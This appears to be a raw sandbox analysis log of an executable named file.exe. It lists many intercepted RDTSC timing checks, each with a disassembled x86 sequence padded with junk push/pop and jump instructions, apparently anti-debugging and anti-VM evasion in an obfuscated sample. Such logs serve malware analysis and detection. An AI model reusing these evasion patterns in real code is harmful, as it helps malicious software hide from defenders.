Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F0442 second address: 55F0458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 mov esi, 01CBCE03h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, dword ptr [ebp+08h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F0458 second address: 55F045C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F045C second address: 55F0462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F04B6 second address: 55F04BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F04BC second address: 55F04CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8F26A1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F04CB second address: 55F04CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 562049D second address: 56204AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8F26A1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56204AF second address: 56204F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007EFDB8CDCB17h 0x0000000f xchg eax, ecx 0x00000010 jmp 00007EFDB8CDCB16h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007EFDB8CDCB0Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56204F8 second address: 56204FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56204FD second address: 562055A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, dl 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov ax, A32Bh 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 mov edi, 20DDBB2Ah 0x00000017 popad 0x00000018 mov dword ptr [esp], esi 0x0000001b pushad 0x0000001c jmp 00007EFDB8CDCB17h 0x00000021 movzx eax, di 0x00000024 popad 0x00000025 lea eax, dword ptr [ebp-04h] 0x00000028 jmp 00007EFDB8CDCB0Bh 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007EFDB8CDCB15h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 562055A second address: 562055F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 562055F second address: 56205DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007EFDB8CDCB0Dh 0x0000000a add cx, 7566h 0x0000000f jmp 00007EFDB8CDCB11h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 jmp 00007EFDB8CDCB11h 0x0000001e nop 0x0000001f pushad 0x00000020 movzx esi, bx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 mov bl, 28h 0x00000028 popad 0x00000029 popad 0x0000002a push dword ptr [ebp+08h] 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007EFDB8CDCB18h 0x00000036 adc ecx, 401E2298h 0x0000003c jmp 00007EFDB8CDCB0Bh 0x00000041 popfd 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5620628 second address: 5620695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, DAh 0x00000005 mov ebx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, eax 0x0000000c pushad 0x0000000d call 00007EFDB8F26A28h 0x00000012 pushfd 0x00000013 jmp 00007EFDB8F26A22h 0x00000018 xor cx, EC18h 0x0000001d jmp 00007EFDB8F26A1Bh 0x00000022 popfd 0x00000023 pop ecx 0x00000024 movsx ebx, si 0x00000027 popad 0x00000028 je 00007EFDB8F26A5Fh 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007EFDB8F26A27h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56206CD second address: 56206D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56206D1 second address: 56206EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56206EE second address: 56206F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56206F4 second address: 56206F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56206F8 second address: 562070C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dl, al 0x0000000e mov ebx, 66C29FB0h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 562070C second address: 5620725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8F26A25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610313 second address: 5610319 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610319 second address: 5610389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 2FEF1CBDh 0x0000000e jmp 00007EFDB8F26A21h 0x00000013 add dword ptr [esp], 45BF818Bh 0x0000001a jmp 00007EFDB8F26A1Eh 0x0000001f push 4A6D8A1Bh 0x00000024 jmp 00007EFDB8F26A21h 0x00000029 xor dword ptr [esp], 3FC4A16Bh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 jmp 00007EFDB8F26A23h 0x00000038 movzx esi, bx 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610389 second address: 561038F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561038F second address: 56103BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000000h] 0x00000011 jmp 00007EFDB8F26A20h 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56103BE second address: 56103C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56103C4 second address: 56103D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8F26A1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56103D3 second address: 56103D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56103D7 second address: 56103F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007EFDB8F26A21h 0x00000011 mov bh, ch 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56103F7 second address: 5610445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 81h 0x00000005 mov ax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov ch, bl 0x0000000f pushfd 0x00000010 jmp 00007EFDB8CDCB16h 0x00000015 and ecx, 2118D3D8h 0x0000001b jmp 00007EFDB8CDCB0Bh 0x00000020 popfd 0x00000021 popad 0x00000022 sub esp, 18h 0x00000025 pushad 0x00000026 mov cl, 90h 0x00000028 mov bh, 27h 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov dx, 1E38h 0x00000033 mov cx, bx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610445 second address: 561044B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561044B second address: 561044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561044F second address: 5610479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx ecx, di 0x0000000f call 00007EFDB8F26A29h 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610479 second address: 561047F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561047F second address: 5610483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610483 second address: 56104AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007EFDB8CDCB14h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFDB8CDCB0Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56104AF second address: 56104B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56104B5 second address: 56104CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56104CE second address: 56104EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56104EA second address: 5610525 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFDB8CDCB11h 0x00000009 add cx, 4256h 0x0000000e jmp 00007EFDB8CDCB11h 0x00000013 popfd 0x00000014 mov esi, 0DEAEFC7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov dh, cl 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610525 second address: 5610567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007EFDB8F26A20h 0x0000000f push eax 0x00000010 jmp 00007EFDB8F26A1Bh 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007EFDB8F26A1Bh 0x0000001e pop esi 0x0000001f mov bx, 9C4Ch 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610567 second address: 561057C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8CDCB11h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561057C second address: 56105B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [75AF4538h] 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop ebx 0x00000014 popad 0x00000015 mov di, ax 0x00000018 popad 0x00000019 xor dword ptr [ebp-08h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007EFDB8F26A23h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56105B9 second address: 56105E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFDB8CDCB0Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56105E4 second address: 56105F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8F26A1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56105F6 second address: 561064F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007EFDB8CDCB16h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007EFDB8CDCB11h 0x00000019 and al, 00000006h 0x0000001c jmp 00007EFDB8CDCB11h 0x00000021 popfd 0x00000022 popad 0x00000023 nop 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov dx, ax 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561064F second address: 561071F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007EFDB8F26A22h 0x00000008 sub esi, 3D6FF9D8h 0x0000000e jmp 00007EFDB8F26A1Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jmp 00007EFDB8F26A28h 0x0000001b popad 0x0000001c lea eax, dword ptr [ebp-10h] 0x0000001f pushad 0x00000020 movzx ecx, di 0x00000023 movsx edx, ax 0x00000026 popad 0x00000027 mov dword ptr fs:[00000000h], eax 0x0000002d jmp 00007EFDB8F26A22h 0x00000032 mov dword ptr [ebp-18h], esp 0x00000035 jmp 00007EFDB8F26A20h 0x0000003a mov eax, dword ptr fs:[00000018h] 0x00000040 pushad 0x00000041 mov eax, 3BAFCF9Dh 0x00000046 call 00007EFDB8F26A1Ah 0x0000004b push ecx 0x0000004c pop edx 0x0000004d pop eax 0x0000004e popad 0x0000004f mov ecx, dword ptr [eax+00000FDCh] 0x00000055 jmp 00007EFDB8F26A1Dh 0x0000005a test ecx, ecx 0x0000005c jmp 00007EFDB8F26A1Eh 0x00000061 jns 00007EFDB8F26A59h 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a call 00007EFDB8F26A1Dh 0x0000006f pop eax 0x00000070 mov cx, di 0x00000073 popad 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561071F second address: 5610737 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 5928EAFFh 0x00000008 mov dx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop eax 0x00000015 push edi 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610737 second address: 561073D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561073D second address: 5610741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610741 second address: 5610745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56004D4 second address: 56004DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56004DA second address: 56004DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56004DE second address: 5600519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007EFDB8CDCB16h 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFDB8CDCB17h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5600519 second address: 5600531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8F26A24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5600531 second address: 5600535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5600535 second address: 560056C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007EFDB8F26A28h 0x00000012 and esi, 5E04DFA8h 0x00000018 jmp 00007EFDB8F26A1Bh 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 560056C second address: 56005A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007EFDB8CDCB14h 0x0000000c and si, 5208h 0x00000011 jmp 00007EFDB8CDCB0Bh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esp], edi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56005A1 second address: 56005A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56005D1 second address: 56005D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5600710 second address: 560075D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 call 00007EFDB8F26A21h 0x0000000a mov eax, 71AAF027h 0x0000000f pop ecx 0x00000010 popad 0x00000011 test eax, eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007EFDB8F26A24h 0x0000001c sub ecx, 1C344E88h 0x00000022 jmp 00007EFDB8F26A1Bh 0x00000027 popfd 0x00000028 movzx esi, bx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 560075D second address: 56007DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFDB8CDCB10h 0x00000009 or ax, B0E8h 0x0000000e jmp 00007EFDB8CDCB0Bh 0x00000013 popfd 0x00000014 mov edi, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jg 00007EFE2917A80Bh 0x0000001f jmp 00007EFDB8CDCB12h 0x00000024 js 00007EFDB8CDCB33h 0x0000002a pushad 0x0000002b mov bx, si 0x0000002e mov dh, al 0x00000030 popad 0x00000031 cmp dword ptr [ebp-14h], edi 0x00000034 pushad 0x00000035 pushad 0x00000036 mov cx, di 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c popad 0x0000003d jne 00007EFE2917A7E9h 0x00000043 jmp 00007EFDB8CDCB14h 0x00000048 mov ebx, dword ptr [ebp+08h] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56007DB second address: 56007DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56007DF second address: 56007E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56007E5 second address: 5600819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFDB8F26A27h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5600819 second address: 5600831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8CDCB14h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5600831 second address: 5600835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5600835 second address: 56008B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007EFDB8CDCB18h 0x00000011 adc eax, 6FF06F28h 0x00000017 jmp 00007EFDB8CDCB0Bh 0x0000001c popfd 0x0000001d movzx eax, di 0x00000020 popad 0x00000021 jmp 00007EFDB8CDCB15h 0x00000026 popad 0x00000027 mov dword ptr [esp], esi 0x0000002a pushad 0x0000002b mov si, A2A3h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushfd 0x00000032 jmp 00007EFDB8CDCB16h 0x00000037 or ax, 83E8h 0x0000003c jmp 00007EFDB8CDCB0Bh 0x00000041 popfd 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56008B7 second address: 56008ED instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007EFDB8F26A28h 0x00000008 and ax, 1648h 0x0000000d jmp 00007EFDB8F26A1Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56008ED second address: 56008F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56008F1 second address: 56008F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56008F7 second address: 5600942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007EFDB8CDCB0Bh 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007EFDB8CDCB0Bh 0x00000019 xor ch, FFFFFFEEh 0x0000001c jmp 00007EFDB8CDCB19h 0x00000021 popfd 0x00000022 mov bx, si 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5600942 second address: 5600963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFDB8F26A1Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5600963 second address: 560098A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov bx, 1E12h 0x0000000f mov dx, 095Eh 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 560098A second address: 560098E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 560098E second address: 5600994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5600A47 second address: 5600A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5600A4D second address: 5600A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56000A0 second address: 56000A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
